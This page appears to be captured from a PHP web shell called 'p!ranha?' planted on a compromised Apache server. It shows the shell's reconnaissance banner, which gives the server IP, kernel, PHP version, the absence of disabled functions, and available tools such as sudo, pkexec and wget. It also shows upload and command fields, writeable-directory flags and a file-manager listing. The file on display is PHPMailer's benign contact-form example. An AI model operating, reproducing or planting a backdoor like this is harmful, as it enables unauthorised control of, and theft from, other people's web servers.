p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.108
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/home/PHPMailer/examples/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/home/PHPMailer/examples/contactform.phps
<?php
/**
 * This example shows how to handle a simple contact form.
 */

$msg = '';
//Don't run this unless we're handling a form submission
if (array_key_exists('email', $_POST)) {
    date_default_timezone_set('Etc/UTC');

    require '../PHPMailerAutoload.php';

    //Create a new PHPMailer instance
    $mail = new PHPMailer;
    //Tell PHPMailer to use SMTP - requires a local mail server
    //Faster and safer than using mail()
    $mail->isSMTP();
    $mail->Host = 'localhost';
    $mail->Port = 25;

    //Use a fixed address in your own domain as the from address
    //**DO NOT** use the submitter's address here as it will be forgery
    //and will cause your messages to fail SPF checks
    $mail->setFrom('from@example.com', 'First Last');
    //Send the message to yourself, or whoever should receive contact for submissions
    $mail->addAddress('whoto@example.com', 'John Doe');
    //Put the submitter's address in a reply-to header
    //This will fail if the address provided is invalid,
    //in which case we should ignore the whole request
    if ($mail->addReplyTo($_POST['email'], $_POST['name'])) {
        $mail->Subject = 'PHPMailer contact form';
        //Keep it simple - don't use HTML
        $mail->isHTML(false);
        //Build a simple message body
        $mail->Body = <<<EOT
Email: {$_POST['email']}
Name: {$_POST['name']}
Message: {$_POST['message']}
EOT;
        //Send the message, check for errors
        if (!$mail->send()) {
            //The reason for failing to send will be in $mail->ErrorInfo
            //but you shouldn't display errors to users - process the error, log it on your server.
            $msg = 'Sorry, something went wrong. Please try again later.';
        } else {
            $msg = 'Message sent! Thanks for contacting us.';
        }
    } else {
        $msg = 'Invalid email address, message ignored.';
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Contact form</title>
</head>
<body>
<h1>Contact us</h1>
<?php if (!empty($msg)) {
    echo "<h2>$msg</h2>";
} ?>
<form method="POST">
    <label for="name">Name: <input type="text" name="name" id="name"></label><br>
    <label for="email">Email address: <input type="email" name="email" id="email"></label><br>
    <label for="message">Message: <textarea name="message" id="message" rows="8" cols="20"></textarea></label><br>
    <input type="submit" value="Send">
</form>
</body>
</html>
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
December 21 2023 09:40:06
1000 / 1000
0755
images
--
December 21 2023 09:40:02
1000 / 1000
0755
scripts
--
December 21 2023 09:40:03
1000 / 1000
0755
styles
--
December 21 2023 09:40:05
1000 / 1000
0755
DKIM.phps
1.305 KB
January 13 2024 08:41:32
1000 / 1000
0755
code_generator.phps
26.819 KB
January 13 2024 08:41:31
1000 / 1000
0755
contactform.phps
2.403 KB
January 13 2024 08:41:31
1000 / 1000
0755
contents.html
0.63 KB
January 13 2024 08:41:32
1000 / 1000
0755
contentsutf8.html
0.887 KB
January 13 2024 08:41:32
1000 / 1000
0755
exceptions.phps
1.447 KB
January 13 2024 08:41:32
1000 / 1000
0755
gmail.phps
2.114 KB
January 13 2024 08:41:32
1000 / 1000
0755
gmail_xoauth.phps
2.614 KB
January 13 2024 08:41:32
1000 / 1000
0755
index.html
6.142 KB
January 13 2024 08:41:32
1000 / 1000
0755
mail.phps
1.038 KB
January 13 2024 08:41:32
1000 / 1000
0755
mailing_list.phps
2.243 KB
January 13 2024 08:41:32
1000 / 1000
0755
pop_before_smtp.phps
2.145 KB
January 13 2024 08:41:32
1000 / 1000
0755
send_file_upload.phps
1.644 KB
January 13 2024 08:41:32
1000 / 1000
0755
send_multiple_file_upload.phps
1.566 KB
January 13 2024 08:41:32
1000 / 1000
0755
sendmail.phps
1.108 KB
January 13 2024 08:41:32
1000 / 1000
0755
signed-mail.phps
4.104 KB
January 13 2024 08:41:33
1000 / 1000
0755
smtp.phps
1.831 KB
January 13 2024 08:41:33
1000 / 1000
0755
smtp_check.phps
1.894 KB
January 13 2024 08:41:33
1000 / 1000
0755
smtp_no_auth.phps
1.702 KB
January 13 2024 08:41:33
1000 / 1000
0755
ssl_options.phps
2.027 KB
January 13 2024 08:41:33
1000 / 1000
0755